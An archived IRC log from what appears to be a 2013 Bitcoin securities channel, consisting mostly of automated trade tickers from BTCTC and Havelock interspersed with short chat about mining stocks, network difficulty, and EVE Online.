00:09:51 mircea_popescu: wait till you meet with the laptops having crypto-chipped power bricks. Aug 09 00:10:02 wait. what ?! Aug 09 00:10:12 a la printer cartridges. Aug 09 00:10:18 that's a thing now ?! Aug 09 00:10:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.03474 BTC [+] Aug 09 00:11:17 mircea_popescu: standard on certain dell, apple, other machines. Aug 09 00:11:32 im so blisfully ignorant. never saw one. Aug 09 00:12:22 the general rule is 'once they can, if they can, they will.' Aug 09 00:12:28 [HAVELOCK] [HIM] 20 @ 0.135 = 2.7 BTC [+] Aug 09 00:12:33 my version is "if you can you must" Aug 09 00:13:25 which assets benefit from positive Avalon news? Aug 09 00:13:44 [BTCTC] [TAT.ASICMINER] 67 @ 0.0342 = 2.2914 BTC [-] Aug 09 00:13:45 [BTCTC] [TAT.ASICMINER] 50 @ 0.03419 = 1.7095 BTC [-] Aug 09 00:13:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.03418 = 0.3418 BTC [-] Aug 09 00:13:48 [BTCTC] [TAT.ASICMINER] 73 @ 0.03416 = 2.4937 BTC [-] Aug 09 00:13:50 [BTCTC] [LABCOIN] 7 @ 0.001429 = 0.01 BTC [+] Aug 09 00:13:52 [HAVELOCK] [HIM] 3 @ 0.135 = 0.405 BTC [+] Aug 09 00:14:44 freeroute none particularly. Aug 09 00:15:00 don't any have orders with Ava? Aug 09 00:15:04 yeah Aug 09 00:15:07 actm Aug 09 00:15:13 oh then I'm gud Aug 09 00:15:15 dont remember the rest Aug 09 00:15:46 I bought a lot of ActM shares @ 0.0075 and above, but still I'm gud Aug 09 00:15:49 [BTCTC] [ASICMINER-PT] 1 @ 3.487 BTC [-] Aug 09 00:15:51 [BTCTC] [ASICMINER-PT] 1 @ 3.486 BTC [-] Aug 09 00:15:52 [BTCTC] [ASICMINER-PT] 1 @ 3.484 BTC [-] Aug 09 00:15:53 [BTCTC] [ASICMINER-PT] 1 @ 3.47 BTC [-] Aug 09 00:15:53 [BTCTC] [ASICMINER-PT] 1 @ 3.469 BTC [-] Aug 09 00:15:54 -_- Aug 09 00:15:55 [BTCTC] [ASICMINER-PT] 1 @ 3.469 BTC [-] Aug 09 00:15:56 [BTCTC] [ASICMINER-PT] 2 @ 3.468 = 6.936 BTC [-] Aug 09 00:15:57 [BTCTC] [ASICMINER-PT] 3 @ 3.467 = 10.401 BTC [-] Aug 09 00:15:58 [BTCTC] [ASICMINER-PT] 7 @ 3.466 = 24.262 BTC [-] Aug 09 00:15:59 [BTCTC] [ASICMINER-PT] 1 @ 3.463 BTC [-] Aug 09 00:16:00 [BTCTC] [ASICMINER-PT] 1 @ 3.462 BTC [-] Aug 09 00:16:01 [BTCTC] [ASICMINER-PT] 1 @ 3.461 BTC [-] Aug 09 00:16:02 [BTCTC] [ASICMINER-PT] 2 @ 3.461 = 6.922 BTC [-] Aug 09 00:16:03 [BTCTC] [ASICMINER-PT] 10 @ 3.46 = 34.6 BTC [-] Aug 09 00:16:04 [BTCTC] [ASICMINER-PT] 1 @ 3.46 BTC [-] Aug 09 00:16:26 yeah you;ll be okay in a month Aug 09 00:16:38 [BTCTC] [BTCGARDEN] 518 @ 0.0156 = 8.0808 BTC [-] Aug 09 00:16:40 [BTCTC] [BTCGARDEN] 1 @ 0.0156 BTC [-] Aug 09 00:16:41 [BTCTC] [BTCGARDEN] 25 @ 0.01557 = 0.3893 BTC [-] Aug 09 00:16:42 by okay i mean double up Aug 09 00:16:42 [BTCTC] [BTCGARDEN] 100 @ 0.01557 = 1.557 BTC [-] Aug 09 00:16:43 [BTCTC] [BTCGARDEN] 676 @ 0.01556 = 10.5186 BTC [-] Aug 09 00:18:29 *if everything goes as planned Aug 09 00:19:10 [HAVELOCK] [AM100] 1 @ 0.0359 BTC [-] Aug 09 00:19:45 [BTCTC] [ACTIVEMINING] 25 @ 0.005403 = 0.1351 BTC [+] Aug 09 00:20:11 [BTCTC] [ACTIVEMINING] 10 @ 0.005402 = 0.054 BTC [-] Aug 09 00:20:57 [BTCTC] [LABCOIN] 100 @ 0.0014 = 0.14 BTC [-] Aug 09 00:20:59 [BTCTC] [LABCOIN] 111 @ 0.001396 = 0.155 BTC [-] Aug 09 00:21:12 [BTCTC] [ACTIVEMINING] 29 @ 0.0054 = 0.1566 BTC [-] Aug 09 00:21:13 [BTCTC] [ACTIVEMINING] 140 @ 0.005355 = 0.7497 BTC [-] Aug 09 00:21:14 [BTCTC] [ACTIVEMINING] 39 @ 0.005349 = 0.2086 BTC [-] Aug 09 00:21:15 [BTCTC] [ACTIVEMINING] 5 @ 0.005345 = 0.0267 BTC [-] Aug 09 00:21:16 [BTCTC] [ACTIVEMINING] 10 @ 0.005345 = 0.0535 BTC [-] Aug 09 00:21:18 [BTCTC] [ACTIVEMINING] 3 @ 0.005345 = 0.016 BTC [-] Aug 09 00:21:19 [BTCTC] [ACTIVEMINING] 374 @ 0.005344 = 1.9987 BTC [-] Aug 09 00:21:30 [BTCTC] [LABCOIN] 239 @ 0.00138 = 0.3298 BTC [-] Aug 09 00:21:46 [BTCTC] [ASICMINER-PT] 1 @ 3.579 BTC [+] Aug 09 00:22:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.03466 = 0.1386 BTC [+] Aug 09 00:27:14 [HAVELOCK] [LABCO] 2 @ 0.00135 = 0.0027 BTC [-] Aug 09 00:27:59 [HAVELOCK] [AM100] 10 @ 0.0352 = 0.352 BTC [-] Aug 09 00:28:02 [HAVELOCK] [AM100] 184 @ 0.0351001 = 6.4584 BTC [-] Aug 09 00:28:03 [HAVELOCK] [AM100] 6 @ 0.035 = 0.21 BTC [-] Aug 09 00:32:25 [HAVELOCK] [AM100] 1 @ 0.0351 BTC [+] Aug 09 00:32:37 [HAVELOCK] [AM100] 143 @ 0.035 = 5.005 BTC [-] Aug 09 00:36:08 [BTCTC] [BITVPS] 19 @ 0.001901 = 0.0361 BTC [-] Aug 09 00:36:10 [BTCTC] [BITVPS] 31 @ 0.0019 = 0.0589 BTC [-] Aug 09 00:37:30 [BTCTC] [LABCOIN] 1 @ 0.0014 BTC [+] Aug 09 00:37:32 [BTCTC] [LABCOIN] 235 @ 0.001384 = 0.3252 BTC [-] Aug 09 00:37:33 [BTCTC] [LABCOIN] 20 @ 0.001383 = 0.0277 BTC [-] Aug 09 00:37:34 [BTCTC] [LABCOIN] 10 @ 0.001381 = 0.0138 BTC [-] Aug 09 00:37:35 [BTCTC] [LABCOIN] 223 @ 0.00138 = 0.3077 BTC [-] Aug 09 00:38:19 [BTCTC] [LABCOIN] 20 @ 0.001381 = 0.0276 BTC [+] Aug 09 00:38:21 [BTCTC] [LABCOIN] 581 @ 0.00138 = 0.8018 BTC [-] Aug 09 00:40:23 [BTCTC] [BASIC-MINING] 1 @ 0.2499 BTC [+] Aug 09 00:40:23 [BTCTC] [BASIC-MINING] 4 @ 0.25 = 1 BTC [+] Aug 09 00:40:53 [BTCTC] [CB.IDIFF-O] 49 @ 0.0088 = 0.4312 BTC [+] Aug 09 00:40:55 [BTCTC] [CB.IDIFF-O] 10000 @ 0.0089 = 89 BTC [+] Aug 09 00:40:56 [BTCTC] [CB.IDIFF-O] 250 @ 0.008923 = 2.2308 BTC [+] Aug 09 00:41:38 [BTCTC] [LABCOIN] 1 @ 0.001408 BTC [+] Aug 09 00:42:55 [BTCTC] [DMS.MINING] 20 @ 0.004501 = 0.09 BTC [+] Aug 09 00:42:56 [BTCTC] [DMS.MINING] 1 @ 0.0045 BTC [-] Aug 09 00:42:58 [BTCTC] [DMS.MINING] 75 @ 0.0043 = 0.3225 BTC [-] Aug 09 00:42:59 [BTCTC] [DMS.MINING] 3 @ 0.004251 = 0.0128 BTC [-] Aug 09 00:43:00 [BTCTC] [DMS.MINING] 100 @ 0.004251 = 0.4251 BTC [-] Aug 09 00:43:01 [BTCTC] [DMS.MINING] 100 @ 0.00425 = 0.425 BTC [-] Aug 09 00:43:01 [BTCTC] [DMS.MINING] 150 @ 0.004221 = 0.6332 BTC [-] Aug 09 00:43:03 [BTCTC] [DMS.MINING] 250 @ 0.00422 = 1.055 BTC [-] Aug 09 00:43:04 [BTCTC] [DMS.MINING] 51 @ 0.004212 = 0.2148 BTC [-] Aug 09 00:43:51 [BTCTC] [DMS.MINING] 49 @ 0.004212 = 0.2064 BTC [-] Aug 09 00:43:52 [BTCTC] [DMS.MINING] 75 @ 0.00421 = 0.3158 BTC [-] Aug 09 00:43:54 [BTCTC] [DMS.MINING] 1 @ 0.0041 BTC [-] Aug 09 00:43:55 [BTCTC] [DMS.MINING] 1 @ 0.004 BTC [-] Aug 09 00:43:56 [BTCTC] [DMS.MINING] 1 @ 0.003997 BTC [-] Aug 09 00:45:12 ;;bc,stats Aug 09 00:45:15 Current Blocks: 250985 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 1014 blocks | Next Difficulty In About: 5 days, 2 hours, 17 minutes, and 29 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Aug 09 00:45:30 [BTCTC] [DMS.SELLING] 130 @ 0.024 = 3.12 BTC [+] Aug 09 00:46:11 [BTCTC] [COGNITIVE] 1 @ 0.3001 BTC [-] Aug 09 00:46:14 [BTCTC] [COGNITIVE] 5 @ 0.3 = 1.5 BTC [-] Aug 09 00:47:17 [BTCTC] [BASIC-MINING] 10 @ 0.2301 = 2.301 BTC [-] Aug 09 00:47:17 [BTCTC] [BASIC-MINING] 5 @ 0.23 = 1.15 BTC [-] Aug 09 00:48:02 [HAVELOCK] [XBOND] 500 @ 0.001044 = 0.522 BTC [-] Aug 09 00:48:04 [HAVELOCK] [XBOND] 1 @ 0.001043 BTC [-] Aug 09 00:48:07 [HAVELOCK] [XBOND] 1 @ 0.001043 BTC [-] Aug 09 00:48:09 [HAVELOCK] [XBOND] 3 @ 0.00104201 = 0.0031 BTC [-] Aug 09 00:48:11 [HAVELOCK] [XBOND] 1 @ 0.00104201 BTC [-] Aug 09 00:48:13 [HAVELOCK] [XBOND] 24 @ 0.0010411 = 0.025 BTC [-] Aug 09 00:48:59 [BTCTC] [ACTIVEMINING] 1 @ 0.0054 BTC [+] Aug 09 00:49:01 [BTCTC] [ACTIVEMINING] 22 @ 0.005345 = 0.1176 BTC [-] Aug 09 00:49:02 [BTCTC] [ACTIVEMINING] 41 @ 0.005344 = 0.2191 BTC [-] Aug 09 00:49:02 [BTCTC] [ACTIVEMINING] 70 @ 0.00534 = 0.3738 BTC [-] Aug 09 00:49:03 [BTCTC] [ACTIVEMINING] 13 @ 0.005336 = 0.0694 BTC [-] Aug 09 00:49:05 [BTCTC] [ACTIVEMINING] 67 @ 0.005335 = 0.3574 BTC [-] Aug 09 00:49:06 [HAVELOCK] [XBOND] 10 @ 0.0010401 = 0.0104 BTC [-] Aug 09 00:49:08 [HAVELOCK] [XBOND] 1 @ 0.00104 BTC [-] Aug 09 00:49:10 [HAVELOCK] [XBOND] 34 @ 0.0010398 = 0.0354 BTC [-] Aug 09 00:49:13 [HAVELOCK] [XBOND] 14 @ 0.001039 = 0.0145 BTC [-] Aug 09 00:49:15 [BTCTC] [ACTIVEMINING] 102 @ 0.005326 = 0.5433 BTC [-] Aug 09 00:49:16 [BTCTC] [ACTIVEMINING] 237 @ 0.005325 = 1.262 BTC [-] Aug 09 00:49:17 [HAVELOCK] [XBOND] 10 @ 0.001038 = 0.0104 BTC [-] Aug 09 00:49:19 [BTCTC] [ACTIVEMINING] 25 @ 0.005322 = 0.1331 BTC [-] Aug 09 00:49:19 [BTCTC] [ACTIVEMINING] 250 @ 0.005321 = 1.3303 BTC [-] Aug 09 00:49:20 [HAVELOCK] [XBOND] 13 @ 0.00103701 = 0.0135 BTC [-] Aug 09 00:49:22 [BTCTC] [ACTIVEMINING] 54 @ 0.005303 = 0.2864 BTC [-] Aug 09 00:49:23 [HAVELOCK] [XBOND] 2000 @ 0.001037 = 2.074 BTC [-] Aug 09 00:49:25 [BTCTC] [ACTIVEMINING] 20 @ 0.005302 = 0.106 BTC [-] Aug 09 00:49:26 [HAVELOCK] [XBOND] 46 @ 0.001035 = 0.0476 BTC [-] Aug 09 00:49:28 [HAVELOCK] [XBOND] 12 @ 0.001033 = 0.0124 BTC [-] Aug 09 00:49:30 [HAVELOCK] [XBOND] 4 @ 0.00103223 = 0.0041 BTC [-] Aug 09 00:49:32 [HAVELOCK] [XBOND] 3 @ 0.0010311 = 0.0031 BTC [-] Aug 09 00:49:34 [BTCTC] [ACTIVEMINING] 250 @ 0.0053 = 1.325 BTC [-] Aug 09 00:49:35 [BTCTC] [ACTIVEMINING] 5 @ 0.005251 = 0.0263 BTC [-] Aug 09 00:49:35 [HAVELOCK] [XBOND] 5 @ 0.001031 = 0.0052 BTC [-] Aug 09 00:49:37 [BTCTC] [ACTIVEMINING] 25 @ 0.00525 = 0.1313 BTC [-] Aug 09 00:49:38 [HAVELOCK] [XBOND] 500 @ 0.00103001 = 0.515 BTC [-] Aug 09 00:49:40 [HAVELOCK] [XBOND] 400 @ 0.00103001 = 0.412 BTC [-] Aug 09 00:49:42 [HAVELOCK] [XBOND] 4000 @ 0.00103 = 4.12 BTC [-] Aug 09 00:49:45 ;;nethash Aug 09 00:49:45 [HAVELOCK] [XBOND] 12398 @ 0.00103 = 12.7699 BTC [-] Aug 09 00:49:45 368372.806197 Aug 09 00:49:47 [BTCTC] [ACTIVEMINING] 102 @ 0.005202 = 0.5306 BTC [-] Aug 09 00:49:48 [BTCTC] [ACTIVEMINING] 5 @ 0.005201 = 0.026 BTC [-] Aug 09 00:49:49 [BTCTC] [ACTIVEMINING] 25 @ 0.0052 = 0.13 BTC [-] Aug 09 00:49:50 [BTCTC] [ACTIVEMINING] 75 @ 0.005126 = 0.3845 BTC [-] Aug 09 00:49:51 [BTCTC] [ACTIVEMINING] 25 @ 0.005125 = 0.1281 BTC [-] Aug 09 00:49:51 [BTCTC] [ACTIVEMINING] 350 @ 0.005123 = 1.7931 BTC [-] Aug 09 00:49:52 [BTCTC] [ACTIVEMINING] 90 @ 0.005106 = 0.4595 BTC [-] Aug 09 00:49:53 [BTCTC] [ACTIVEMINING] 450 @ 0.005105 = 2.2973 BTC [-] Aug 09 00:49:54 [BTCTC] [ACTIVEMINING] 45 @ 0.005103 = 0.2296 BTC [-] Aug 09 00:49:55 [BTCTC] [ACTIVEMINING] 200 @ 0.005102 = 1.0204 BTC [-] Aug 09 00:49:56 [BTCTC] [ACTIVEMINING] 25 @ 0.0051 = 0.1275 BTC [-] Aug 09 00:49:57 [BTCTC] [ACTIVEMINING] 60 @ 0.005051 = 0.3031 BTC [-] Aug 09 00:49:58 [BTCTC] [ACTIVEMINING] 300 @ 0.00505 = 1.515 BTC [-] Aug 09 00:49:59 [BTCTC] [ACTIVEMINING] 74 @ 0.005007 = 0.3705 BTC [-] Aug 09 00:49:59 [BTCTC] [ACTIVEMINING] 70 @ 0.005006 = 0.3504 BTC [-] Aug 09 00:50:01 [BTCTC] [ACTIVEMINING] 300 @ 0.005005 = 1.5015 BTC [-] Aug 09 00:50:01 [BTCTC] [ACTIVEMINING] 739 @ 0.005002 = 3.6965 BTC [-] Aug 09 00:50:02 [BTCTC] [ACTIVEMINING] 598 @ 0.005001 = 2.9906 BTC [-] Aug 09 00:50:03 [BTCTC] [ACTIVEMINING] 430 @ 0.005001 = 2.1504 BTC [-] Aug 09 00:50:04 [BTCTC] [ACTIVEMINING] 40 @ 0.005 = 0.2 BTC [-] Aug 09 00:50:05 [BTCTC] [ACTIVEMINING] 2500 @ 0.005 = 12.5 BTC [-] Aug 09 00:50:06 [BTCTC] [ACTIVEMINING] 1 @ 0.005 BTC [-] Aug 09 00:50:07 [BTCTC] [ACTIVEMINING] 125 @ 0.005 = 0.625 BTC [-] Aug 09 00:50:08 [BTCTC] [ACTIVEMINING] 2 @ 0.005 = 0.01 BTC [-] Aug 09 00:51:55 [BTCTC] [ACTIVEMINING] 6 @ 0.004999 = 0.03 BTC [-] Aug 09 00:52:14 [HAVELOCK] [XBOND] 20 @ 0.0010411 = 0.0208 BTC [+] Aug 09 00:53:14 [HAVELOCK] [SMG] 100 @ 0.00020101 = 0.0201 BTC [-] Aug 09 00:53:16 [HAVELOCK] [SMG] 10 @ 0.000201 = 0.002 BTC [-] Aug 09 00:53:19 [HAVELOCK] [SMG] 10 @ 0.000201 = 0.002 BTC [-] Aug 09 00:53:21 [HAVELOCK] [SMG] 10 @ 0.000201 = 0.002 BTC [-] Aug 09 00:53:23 [HAVELOCK] [SMG] 100 @ 0.0002 = 0.02 BTC [-] Aug 09 00:53:25 [HAVELOCK] [SMG] 200 @ 0.000195 = 0.039 BTC [-] Aug 09 00:53:27 [HAVELOCK] [SMG] 120 @ 0.0001901 = 0.0228 BTC [-] Aug 09 00:54:32 https://bitcointalk.org/index.php?topic=269813 miners finally started thinking about hedging Aug 09 00:54:38 Help me hedge difficulty Aug 09 00:54:39 [BTCTC] [BTCGARDEN] 124 @ 0.01556 = 1.9294 BTC [-] Aug 09 00:54:40 [BTCTC] [BTCGARDEN] 80 @ 0.01555 = 1.244 BTC [-] Aug 09 00:54:41 [BTCTC] [BTCGARDEN] 44 @ 0.01553 = 0.6833 BTC [-] Aug 09 00:54:42 [BTCTC] [BTCGARDEN] 268 @ 0.01551 = 4.1567 BTC [-] Aug 09 00:54:52 [HAVELOCK] [XBOND] 20 @ 0.00104699 = 0.0209 BTC [+] Aug 09 00:55:02 [HAVELOCK] [XBOND] 2 @ 0.00104699 = 0.0021 BTC [+] Aug 09 00:55:13 but by now it's a bit late, no one can help if such huge diff increases continue Aug 09 00:55:24 [BTCTC] [ACTIVEMINING] 437 @ 0.004999 = 2.1846 BTC [-] Aug 09 00:55:27 [BTCTC] [ACTIVEMINING] 1550 @ 0.005 = 7.75 BTC [+] Aug 09 00:56:01 [BTCTC] [ACTIVEMINING] 40 @ 0.005 = 0.2 BTC [+] Aug 09 00:56:33 [BTCTC] [ACTIVEMINING] 15 @ 0.004999 = 0.075 BTC [-] Aug 09 00:56:35 [BTCTC] [ACTIVEMINING] 4 @ 0.004999 = 0.02 BTC [-] Aug 09 00:56:37 [HAVELOCK] [XBOND] 10 @ 0.0010459 = 0.0105 BTC [-] Aug 09 00:57:07 [BTCTC] [ACTIVEMINING] 7 @ 0.004999 = 0.035 BTC [-] Aug 09 00:57:41 [HAVELOCK] [SDSTM] 6 @ 0.0062912 = 0.0377 BTC [-] Aug 09 00:58:42 [HAVELOCK] [XBOND] 26 @ 0.00104699 = 0.0272 BTC [+] Aug 09 01:00:41 [HAVELOCK] [SDSTM] 2 @ 0.0062991 = 0.0126 BTC [+] Aug 09 01:01:21 way it usually works. Aug 09 01:01:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.03413 = 0.3413 BTC [-] Aug 09 01:01:36 most people want to buy medical insurance after they're wel lsick. Aug 09 01:02:13 [HAVELOCK] [AM100] 1 @ 0.03599999 BTC [+] Aug 09 01:02:17 [BTCTC] [ACTIVEMINING] 119 @ 0.004999 = 0.5949 BTC [-] Aug 09 01:02:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.03461 = 0.1038 BTC [+] Aug 09 01:02:37 [HAVELOCK] [SDSTM] 2 @ 0.0062991 = 0.0126 BTC [+] Aug 09 01:02:46 [BTCTC] [TAT.ASICMINER] 20 @ 0.03462 = 0.6924 BTC [+] Aug 09 01:03:07 [HAVELOCK] [XBOND] 10 @ 0.00104699 = 0.0105 BTC [+] Aug 09 01:03:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.03462 = 0.0692 BTC [+] Aug 09 01:03:22 [BTCTC] [ACTIVEMINING] 597 @ 0.005 = 2.985 BTC [+] Aug 09 01:03:24 [BTCTC] [BTCGARDEN] 62 @ 0.01551 = 0.9616 BTC [-] Aug 09 01:03:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.03412 = 0.0682 BTC [-] Aug 09 01:04:47 [BTCTC] [TAT.ASICMINER] 8 @ 0.0341 = 0.2728 BTC [-] Aug 09 01:05:12 [BTCTC] [ASICMINER-PT] 1 @ 3.497 BTC [-] Aug 09 01:07:54 [BTCTC] [ASICMINER-PT] 1 @ 3.5 BTC [+] Aug 09 01:08:21 [BTCTC] [TAT.VIRTUALMINE] 360 @ 0.002198 = 0.7913 BTC [-] Aug 09 01:08:51 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.002198 = 0.022 BTC [-] Aug 09 01:10:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.03461 BTC [+] Aug 09 01:11:46 [BTCTC] [TAT.ASICMINER] 43 @ 0.03461 = 1.4882 BTC [+] Aug 09 01:13:40 [BTCTC] [LABCOIN] 1 @ 0.001366 BTC [-] Aug 09 01:13:52 [BTCTC] [ACTIVEMINING] 50 @ 0.0052 = 0.26 BTC [+] Aug 09 01:15:52 [HAVELOCK] [LABCO] 8 @ 0.00134201 = 0.0107 BTC [-] Aug 09 01:16:02 [HAVELOCK] [LABCO] 10 @ 0.00134201 = 0.0134 BTC [-] Aug 09 01:16:10 [HAVELOCK] [LABCO] 14 @ 0.001342 = 0.0188 BTC [-] Aug 09 01:16:20 [HAVELOCK] [LABCO] 100 @ 0.00134 = 0.134 BTC [-] Aug 09 01:16:43 [HAVELOCK] [LABCO] 95 @ 0.00133 = 0.1264 BTC [-] Aug 09 01:16:56 [HAVELOCK] [LABCO] 50 @ 0.001311 = 0.0656 BTC [-] Aug 09 01:17:04 [BTCTC] [TAT.ASICMINER] 5 @ 0.03477 = 0.1739 BTC [+] Aug 09 01:17:06 [HAVELOCK] [LABCO] 10 @ 0.001301 = 0.013 BTC [-] Aug 09 01:17:16 [BTCTC] [TAT.ASICMINER] 8 @ 0.03477 = 0.2782 BTC [+] Aug 09 01:17:20 [HAVELOCK] [LABCO] 100 @ 0.0013 = 0.13 BTC [-] Aug 09 01:17:50 [HAVELOCK] [LABCO] 7 @ 0.0012 = 0.0084 BTC [-] Aug 09 01:18:49 [HAVELOCK] [LABCO] 16 @ 0.0011611 = 0.0186 BTC [-] Aug 09 01:21:35 [BTCTC] [DMS.MINING] 17 @ 0.004001 = 0.068 BTC [+] Aug 09 01:21:38 [BTCTC] [ASICMINER-PT] 1 @ 3.431 BTC [-] Aug 09 01:24:53 why is asicminer down so much Aug 09 01:25:13 ( ´,_ゝ`) Aug 09 01:25:23 i think people are just not paying attention to mining stocks Aug 09 01:25:28 so some money is going elsewhere Aug 09 01:25:41 [BTCTC] [ASICMINER-PT] 1 @ 3.55 BTC [+] Aug 09 01:25:47 the dividends are pretty good still though Aug 09 01:26:05 did they release there new boards yet? Aug 09 01:26:11 their* Aug 09 01:28:14 [HAVELOCK] [XBOND] 990 @ 0.0010459 = 1.0354 BTC [-] Aug 09 01:28:44 [HAVELOCK] [AM100] 1 @ 0.0367 BTC [+] Aug 09 01:28:59 [BTCTC] [TAT.ASICMINER] 12 @ 0.03467 = 0.416 BTC [-] Aug 09 01:31:19 [BTCTC] [ASICMINER-PT] 1 @ 3.431 BTC [-] Aug 09 01:32:38 [BTCTC] [ACTIVEMINING] 50 @ 0.005165 = 0.2583 BTC [-] Aug 09 01:32:40 [BTCTC] [ACTIVEMINING] 10 @ 0.005166 = 0.0517 BTC [+] Aug 09 01:32:52 [BTCTC] [ACTIVEMINING] 472 @ 0.0052 = 2.4544 BTC [+] Aug 09 01:36:24 [BTCTC] [LABCOIN] 6 @ 0.001356 = 0.0081 BTC [-] Aug 09 01:37:30 [HAVELOCK] [AM100] 29 @ 0.0367 = 1.0643 BTC [+] Aug 09 01:37:44 [HAVELOCK] [LABCO] 5 @ 0.0012 = 0.006 BTC [+] Aug 09 01:37:52 [HAVELOCK] [LABCO] 5 @ 0.0013 = 0.0065 BTC [+] Aug 09 01:37:58 [HAVELOCK] [LABCO] 2 @ 0.001301 = 0.0026 BTC [+] Aug 09 01:38:03 [HAVELOCK] [LABCO] 5 @ 0.001311 = 0.0066 BTC [+] Aug 09 01:38:23 [HAVELOCK] [LABCO] 5 @ 0.00133 = 0.0067 BTC [+] Aug 09 01:40:37 [BTCTC] [BTCGARDEN] 28 @ 0.01588 = 0.4446 BTC [+] Aug 09 01:40:40 [BTCTC] [BTCGARDEN] 28 @ 0.01588 = 0.4446 BTC [+] Aug 09 01:41:38 [BTCTC] [LABCOIN] 400 @ 0.00136 = 0.544 BTC [+] Aug 09 01:42:29 [HAVELOCK] [XBOND] 541 @ 0.0010306 = 0.5576 BTC [-] Aug 09 01:42:31 [HAVELOCK] [XBOND] 49 @ 0.0010305 = 0.0505 BTC [-] Aug 09 01:42:34 [HAVELOCK] [XBOND] 2500 @ 0.00103001 = 2.575 BTC [-] Aug 09 01:42:36 [HAVELOCK] [XBOND] 1706 @ 0.00103 = 1.7572 BTC [-] Aug 09 01:42:45 [HAVELOCK] [AM1] 1 @ 3.68999999 BTC [+] Aug 09 01:43:32 [HAVELOCK] [AM100] 10 @ 0.0368 = 0.368 BTC [+] Aug 09 01:44:23 [BTCTC] [LABCOIN] 1 @ 0.001372 BTC [+] Aug 09 01:44:51 [BTCTC] [LABCOIN] 20 @ 0.001373 = 0.0275 BTC [+] Aug 09 01:44:52 [BTCTC] [LABCOIN] 3 @ 0.00143 = 0.0043 BTC [+] Aug 09 01:44:53 [BTCTC] [LABCOIN] 7 @ 0.001431 = 0.01 BTC [+] Aug 09 01:44:55 [BTCTC] [LABCOIN] 10 @ 0.001432 = 0.0143 BTC [+] Aug 09 01:44:55 [BTCTC] [LABCOIN] 50 @ 0.001433 = 0.0717 BTC [+] Aug 09 01:45:29 [BTCTC] [LABCOIN] 150 @ 0.001463 = 0.2195 BTC [+] Aug 09 01:45:37 [BTCTC] [BTCGARDEN] 44 @ 0.01588 = 0.6987 BTC [+] Aug 09 01:46:20 [BTCTC] [LABCOIN] 62 @ 0.001463 = 0.0907 BTC [+] Aug 09 01:46:56 [HAVELOCK] [AM100] 23 @ 0.0368 = 0.8464 BTC [+] Aug 09 01:49:39 [BTCTC] [DMS.SELLING] 35 @ 0.0235 = 0.8225 BTC [-] Aug 09 01:50:16 [HAVELOCK] [LABCO] 10 @ 0.00134 = 0.0134 BTC [+] Aug 09 01:50:24 [HAVELOCK] [LABCO] 9 @ 0.00134 = 0.0121 BTC [+] Aug 09 01:51:24 [BTCTC] [DMS.MINING] 42 @ 0.00401 = 0.1684 BTC [+] Aug 09 01:52:32 [BTCTC] [TAT.ASICMINER] 12 @ 0.03473 = 0.4168 BTC [+] Aug 09 01:52:35 [BTCTC] [BASIC-MINING] 1 @ 0.23 BTC [-] Aug 09 01:53:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.03479 = 0.174 BTC [+] Aug 09 01:53:27 [BTCTC] [S.MPOE-PT] 3 @ 0.0008701 = 0.0026 BTC [-] Aug 09 01:53:52 [BTCTC] [LABCOIN] 1 @ 0.001438 BTC [-] Aug 09 01:54:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.03478 = 0.1043 BTC [-] Aug 09 01:55:54 ;;estimate Aug 09 01:55:55 Next difficulty estimate | None based on data since last change | 51505423.6791 based on data for last three days Aug 09 01:55:57 ;;bc,stats Aug 09 01:55:59 Current Blocks: 250997 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 1002 blocks | Next Difficulty In About: 5 days, 2 hours, 4 minutes, and 15 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Aug 09 01:56:01 Bajeezus Aug 09 01:57:06 ;;calc 0.0235 * 20 Aug 09 01:57:06 0.47 Aug 09 01:57:15 ;;calc 0.47 + 0.18 Aug 09 01:57:15 0.65 Aug 09 01:58:41 ;;calc 20 * 0.02827 Aug 09 01:58:41 0.5654 Aug 09 01:59:50 ;;calc 0.45 + 0.13 Aug 09 01:59:51 0.58 Aug 09 01:59:53 http://oldforums.eveonline.com/?a=topic&threadID=691936 Aug 09 01:59:56 EVE Online | EVE Insider | Forums Aug 09 01:59:59 Posted - 2008.01.27 07:35:00 - [1] Aug 09 01:59:59 Aug 09 01:59:59 So, you want to start an IPO. Unfortunately, you've had problems/are having problems/are worried about having problems with trust & getting funding. Sound like you? Then this post should help. Aug 09 02:00:22 [HAVELOCK] [XBOND] 2 @ 0.001047 = 0.0021 BTC [+] Aug 09 02:01:18 mircea_popescu how much eve do you play now? Aug 09 02:01:23 your new found love? Aug 09 02:02:36 well seeing how the market and skilling work on their own i'd say i play about 24/7 Aug 09 02:02:55 [BTCTC] [LABCOIN] 10 @ 0.001426 = 0.0143 BTC [-] Aug 09 02:04:21 lol no mining for you Aug 09 02:04:34 [HAVELOCK] [AM1] 1 @ 3.69 BTC [+] Aug 09 02:05:03 too lazy to afk mine Aug 09 02:05:07 3-4mn an hour meh. Aug 09 02:05:24 and also http://trilema.com/2013/meet-helga-the-whale/ Aug 09 02:05:56 [BTCTC] [BASIC-MINING] 1 @ 0.25 BTC [+] Aug 09 02:07:06 [BTCTC] [PAJKA.BOND] 14 @ 0.019 = 0.266 BTC [-] Aug 09 02:07:08 [BTCTC] [PAJKA.BOND] 5 @ 0.019 = 0.095 BTC [-] Aug 09 02:08:10 [BTCTC] [LABCOIN] 50 @ 0.001406 = 0.0703 BTC [-] Aug 09 02:08:24 [BTCTC] [LABCOIN] 2 @ 0.001405 = 0.0028 BTC [-] Aug 09 02:08:53 [BTCTC] [PAJKA.BOND] 10 @ 0.012 = 0.12 BTC [-] Aug 09 02:12:08 [BTCTC] [LABCOIN] 50 @ 0.001427 = 0.0714 BTC [+] Aug 09 02:12:49 [BTCTC] [LABCOIN] 10 @ 0.001425 = 0.0143 BTC [-] Aug 09 02:12:49 [BTCTC] [LABCOIN] 9 @ 0.001426 = 0.0128 BTC [+] Aug 09 02:13:45 